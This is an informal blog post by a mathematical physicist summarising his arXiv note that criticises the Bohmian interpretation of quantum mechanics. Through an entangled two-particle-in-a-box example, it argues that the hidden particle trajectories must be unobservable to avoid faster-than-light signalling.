Now, I have been in Munich for over ten years. And here at the LMU math department there is a group calling themselves the Workgroup Mathematical Foundations of Physics. And let's be honest, I call them the Bohmians (and sometimes the Bohemians). And once more, most people believe that the Bohmian interpretation of quantum mechanics is just a fringe approach that is not worth wasting any time on. You will have already guessed it: I did so none the less. So here is a condensed report of what I learned and what I think should be the official opinion on this approach. This is an informal write up of a notes paper that I put on the arXiv today.

Bohmians don't like about the usual (termed Copenhagen lacking a better word) approach to quantum mechanics that you are not allowed to talk about so many things and that the observer plays such a prominent role by determining via a measurement what aspect is real an what is not. They think this is far too subjective. So rather, they want quantum mechanics to be about particles that then are allowed to follow trajectories.

"But we know this is impossible!" I hear you cry. So, let's see how this works. The key observation is that the Schrödinger equation for a Hamilton operator of the form kinetic term (possibly with magnetic field) plus potential term, has  a conserved current

$$j = \bar\psi\nabla\psi - (\nabla\bar\psi)\psi.$$

So as your probability density is $\rho=\bar\psi\psi$, you can think of that being made up of particles moving with a velocity field

$$v = j/\rho = 2\Im(\nabla \psi/\psi).$$

What this buys you is that if you have a bunch of particles that is initially distributed like the probability density and follows the flow of the velocity field it will also later be distributed like $|\psi |^2$.

What is important is that they keep the Schrödinger equation in tact. So everything that you can do with the original Schrödinger equation (i.e. everything) can be done in the Bohmian approach as well.  If you set up your Hamiltonian to describe a double slit experiment, the Bohmian particles will flow nicely to the screen and arrange themselves in interference fringes (as the probability density does). So you will never come to a situation where any experimental outcome will differ  from what the Copenhagen prescription predicts.

The price you have to pay, however, is that you end up with a very non-local theory: The velocity field lives in configuration space, so the velocity of every particle depends on the position of all other particles in the universe. I would say, this is already a show stopper (given what we know about quantum field theory whose raison d'être is locality) but let's ignore this aesthetic concern.

What got me into this business was the attempt to understand how the set-ups like Bell's inequality and GHZ and the like work out that are supposed to show that quantum mechanics cannot be classical (technically that the state space cannot be described as local probability densities). The problem with those is that they are often phrased in terms of spin degrees of freedom which have Hamiltonians that are not directly of the form above. You can use a Stern-Gerlach-type apparatus to translate the spin degree of freedom to a positional but at the price of a Hamiltonian that is not explicitly know let alone for which you can analytically solve the Schrödinger equation. So you don't see much.

But from Reinhard Werner and collaborators I learned how to set up qubit-like algebras from positional observables of free particles (at different times, so get something non-commuting which you need to make use of entanglement as a specific quantum resource). So here is my favourite example:

You start with two particles each following a free time evolution but confined to an interval. You set those up in a particular entangled state (stationary as it is an eigenstate of the Hamiltonian) built from the two lowest levels of the particle in the box. And then you observe for each particle if it is in the left or the right half of the interval.

From symmetry considerations (details in my paper) you can see that each particle is with the same probability on the left and the right. But they are anti-correlated when measured at the same time. But when measured at different times, the correlation oscillates like the cosine of the time difference.

From the Bohmian perspective, for the static initial state, the velocity field vanishes everywhere, nothing moves. But in order to capture the time dependent correlations, as soon as one particle has been measured, the position of the second particle has to oscillate in the box (how the measurement works in detail is not specified in the Bohmian approach since it involves other degrees of freedom and remember, everything depends on everything but somehow it has to work since you want to produce the correlations that are predicted by the Copenhagen approach).

 The trajectory of the second particle depending on its initial position

This is somehow the Bohmian version of the collapse of the wave function but they would never phrase it that way.

And here is where it becomes problematic: If you could see the Bohmian particle moving you could decide if the other particle has been measured (it would oscillate) or not (it would stand still). No matter where the other particle is located. With this observation you could build a telephone that transmits information instantaneously, something that should not exist. So you have to conclude you must not be able to look at the second particle and see if it oscillates or not.

Bohmians  tell you you cannot because all you are supposed to observer about the particles are their positions (and not their velocity). And if you try to measure the velocity by measuring the position at two instants in time you don't because the first observation disturbs the particle so much that it invalidates the original state.

As it turns out, you are not allowed to observe anything else about the particles than that they are distributed like $|\psi |^2$ because if you could, you could build a similar telephone (at least statistically) as I explain the in the paper (this fact is known in the Bohm literature but I found it nowhere so clearly demonstrated as in this two particle system).

My conclusion is that the Bohm approach adds something (the particle positions) to the wave function but then in the end tells you you are not allowed to observe this or have any knowledge of this beyond what is already encoded in the wave function. It's like making up an invisible friend.

PS: If you haven't seen "Bohemian Rhapsody", yet, you should, even if there are good reasons to criticise the dramatisation of real events.